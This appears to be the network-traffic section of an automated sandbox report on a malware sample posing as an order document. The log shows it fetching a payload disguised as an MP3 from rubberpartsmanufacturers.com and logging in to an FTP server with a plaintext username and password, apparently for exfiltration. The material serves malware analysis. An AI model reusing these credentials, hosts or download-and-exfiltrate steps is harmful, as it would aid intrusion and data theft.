                                        Oct 9, 2024 10:51:18.142411947 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142636061 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.142704964 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142940044 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143016100 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.143311024 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143376112 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.143522024 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.143589020 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.223671913 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.223738909 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.223853111 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.223908901 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224220037 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224281073 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224463940 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224523067 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.224920034 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.224983931 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225357056 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225409985 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225413084 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225423098 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.225455999 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.225950956 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226007938 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226023912 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226083040 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226696968 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226756096 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226758957 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226767063 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.226797104 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.226809978 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227430105 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227493048 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227559090 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227607012 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.227615118 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.227659941 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.228343964 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.228391886 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.228394032 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.198402882 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.198409081 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.198923111 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.198990107 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.199008942 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.238651037 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.341244936 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.341378927 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.341437101 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.341464996 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.341507912 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.341515064 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.341701984 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.341768026 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.342117071 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.342189074 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.342200041 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.342226982 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.342262983 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.342293978 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.342694998 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.342767000 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.343210936 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.343281031 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.343292952 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.343362093 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.343765020 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.343831062 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.343888044 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.343956947 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.343964100 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.343988895 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.344022036 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.344042063 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.344691038 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.344758987 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.344769001 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.344780922 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.344816923 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.344835043 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.345551014 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.345618010 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.345627069 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.345664978 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.345685959 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.345694065 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.345707893 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.345730066 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.346333027 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.346416950 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.429002047 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.429106951 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.429414988 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.429501057 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.429728985 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.429796934 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.429833889 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.429925919 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.430145979 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.430228949 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.430675030 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.430743933 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.431029081 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.431099892 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.431206942 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.431278944 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.431291103 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.431358099 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432199955 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.432280064 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432290077 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.432317972 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.432349920 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432375908 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432748079 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.432820082 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432845116 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.432919025 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.432933092 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.433000088 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.433900118 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.433971882 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.433990002 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.434056997 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.574551105 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.574625015 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.574759960 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.574809074 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.575066090 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.575117111 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.575414896 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.575478077 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.575726986 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.575781107 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.576121092 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.576181889 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.576433897 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.576483965 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.576865911 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.576921940 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.577023029 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.577075005 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.577568054 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.577625036 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.577713966 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.577770948 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.578263998 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.578327894 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.578421116 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.578475952 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.578957081 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.579020023 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.579165936 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.579222918 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.579349995 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.579474926 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.662007093 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.662111998 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.662132025 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.662158012 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.662180901 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.662203074 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.662393093 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.662455082 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.662849903 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.662910938 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.663291931 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.663352013 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.663358927 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.663372040 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.663403988 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664011955 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664098024 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664144993 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664207935 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664694071 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664774895 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664777040 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664786100 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664824963 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664824963 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664844036 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664854050 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664885998 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664913893 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666064024 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666122913 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666142941 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666153908 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666177988 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666188002 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666194916 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666199923 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666243076 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666304111 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666361094 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666367054 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666388035 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666412115 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666441917 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.674438953 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:29.246506929 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.251547098 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:29.252777100 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.896641016 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:29.923542023 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.935475111 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.158037901 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.167351007 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.172322989 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.409931898 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.410108089 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.415081024 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.633862972 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.634056091 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.639172077 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.849375010 CEST4974021192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.858278990 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.858453035 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.863365889 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.082277060 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.082462072 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.087609053 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.306466103 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.307218075 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.312223911 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.312374115 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.312442064 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.317363024 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.936820030 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.937083006 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.937148094 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.941932917 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.942528009 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.942584038 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.988519907 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:32.161956072 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:32.207269907 CEST4974321192.168.2.45.2.84.236
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 10:50:58.216767073 CEST | 53573 | 53 | 192.168.2.4 | 1.1.1.1
Oct 9, 2024 10:50:58.743102074 CEST | 53 | 53573 | 1.1.1.1 | 192.168.2.4
Oct 9, 2024 10:51:04.537235975 CEST | 63577 | 53 | 192.168.2.4 | 1.1.1.1
Oct 9, 2024 10:51:04.657974958 CEST | 53 | 63577 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 9, 2024 10:50:58.216767073 CEST | 192.168.2.4 | 1.1.1.1 | 0xb842 | Standard query (0) | rubberpartsmanufacturers.com | A (IP address) | IN (0x0001) | false
Oct 9, 2024 10:51:04.537235975 CEST | 192.168.2.4 | 1.1.1.1 | 0xe916 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 9, 2024 10:50:58.743102074 CEST | 1.1.1.1 | 192.168.2.4 | 0xb842 | No error (0) | rubberpartsmanufacturers.com | | 103.191.208.122 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 10:51:04.657974958 CEST | 1.1.1.1 | 192.168.2.4 | 0xe916 | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
                                        • rubberpartsmanufacturers.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 103.191.208.122 | 443 | 7444 | C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 08:51:00 UTC | 94 | OUT | GET /omani/Mrlres.mp3 HTTP/1.1
Host: rubberpartsmanufacturers.com
Connection: Keep-Alive
2024-10-09 08:51:00 UTC | 235 | IN | HTTP/1.1 200 OK
Date: Wed, 09 Oct 2024 08:51:00 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
Accept-Ranges: bytes
Content-Length: 958480
Content-Type: audio/mpeg
                                        2024-10-09 08:51:00 UTC8000INData Raw: bb ca 76 1d f5 7c 55 6b 58 74 c6 32 63 37 fb 1d f2 d1 a7 e8 a0 9c f2 bb f8 ec 5e f4 86 38 44 4e c6 04 93 be cb 87 9f 96 1e 8e a0 bf 1a 1c 3c fb 6e ad f8 68 02 04 d3 53 5f b9 bf f0 ab 24 8b 01 98 fa 30 fc 97 78 3d 76 6f e6 6f b0 8f 25 6d b4 3a e1 16 71 3e b5 17 b6 41 98 31 78 36 40 1c a6 19 20 55 89 99 e9 da 4d 84 72 cf 4e 98 9c b8 c2 8a 2b d1 12 98 ba 13 db 4f 33 ac c2 9f 2c b6 ef 3f f4 54 ed 4a d4 7a 05 41 c3 e6 b4 1b db 02 03 19 e0 ff 79 1b 86 ed 4f d7 b7 29 3d c0 d0 82 76 f4 37 5d 0c e6 73 4c be c6 7d ed de f8 d6 a7 ff 28 72 96 36 64 84 d3 4b 1e 78 44 f1 bc 62 64 58 16 90 6e 57 63 1d 4e 19 10 ba 63 84 32 42 7d e6 c0 2b 41 8a 3e eb bf 4c 84 ad aa 6c a1 a2 3e 56 23 71 4a 14 1d b0 b9 3f fa da 5b fd 99 f6 4b b2 0c 0d e4 88 1d ca 5b 75 68 dc 94 98 5f 59 0f
                                        Data Ascii: v|UkXt2c7^8DN<nhS_$0x=voo%m:q>A1x6@ UMrN+O3,?TJzAyO)=v7]sL}(r6dKxDbdXnWcNc2B}+A>Ll>V#qJ?[K[uh_Y
                                        2024-10-09 08:51:00 UTC8000INData Raw: 8a 0b 21 00 87 bc 1a 06 7f 57 bd 89 8c 18 4d b5 17 4c b6 e6 f7 ac e1 71 09 a5 e1 7f 86 4a d5 1b 4f 02 2d 8f c9 c4 5a e5 79 5c b4 22 4e 81 62 84 aa 93 87 4b a6 b7 ec ea 16 4c a3 81 df f6 b1 9e c8 32 b2 b0 4f 60 e5 cd e2 47 09 ea fb ff cb 64 b9 05 15 93 11 12 72 c7 28 43 21 fb a2 2e f0 99 ed 75 af 32 fd 17 53 85 eb b4 b5 09 f5 da 52 9c cc 9e 35 10 f2 4c 6a d7 33 32 01 c7 15 c7 9c 29 0a 6e 60 f2 40 a8 75 d4 5e 69 97 4c 67 54 5b ae bd 56 ee af b3 95 e1 fd a3 ad 73 ba 98 b6 15 05 fb b5 2c 53 2f d5 76 d4 0a af 14 43 4d c3 06 5c 12 2d 10 15 5d c9 a8 92 b4 7b 12 fb 29 fa 9d b1 bf 43 5a 7e ed 57 cf 7e ef 29 d4 5c ea 37 f4 cd 7f 7e 5b e4 92 02 a1 0e b0 5c 8c 95 f5 27 57 49 02 9c d4 f4 c9 f1 4d 46 e1 d5 6e c6 d1 8d ea 8e 3f 96 09 1a dd 1a 83 a5 e6 12 b5 0d 86 34 3c
                                        Data Ascii: !WMLqJO-Zy\"NbKL2O`Gdr(C!.u2SR5Lj32)n`@u^iLgT[Vs,S/vCM\-]{)CZ~W~)\7~[\'WIMFn?4<


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.4 | 49735 | 103.191.208.122 | 443 | 7744 | C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-09 08:51:16 UTC | 94 | OUT | GET /omani/Mrlres.mp3 HTTP/1.1
                                        Host: rubberpartsmanufacturers.com
                                        Connection: Keep-Alive
                                        2024-10-09 08:51:17 UTC | 235 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 09 Oct 2024 08:51:17 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 958480
                                        Content-Type: audio/mpeg


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.4 | 49742 | 103.191.208.122 | 443 | 8052 | C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-09 08:51:24 UTC | 94 | OUT | GET /omani/Mrlres.mp3 HTTP/1.1
                                        Host: rubberpartsmanufacturers.com
                                        Connection: Keep-Alive
                                        2024-10-09 08:51:25 UTC | 235 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 09 Oct 2024 08:51:24 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 958480
                                        Content-Type: audio/mpeg


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 9, 2024 10:51:05.319823027 CEST21497315.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:05.324054003 CEST4973121192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                        Oct 9, 2024 10:51:05.549638033 CEST21497315.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:05.556726933 CEST4973121192.168.2.45.2.84.236PASS Fineboy777@
                                        Oct 9, 2024 10:51:05.856355906 CEST21497315.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:06.081975937 CEST21497315.2.84.236192.168.2.4504 Unknown command
                                        Oct 9, 2024 10:51:06.082195997 CEST4973121192.168.2.45.2.84.236PWD
                                        Oct 9, 2024 10:51:06.307672024 CEST21497315.2.84.236192.168.2.4257 "/" is your current location
                                        Oct 9, 2024 10:51:06.307852030 CEST4973121192.168.2.45.2.84.236TYPE I
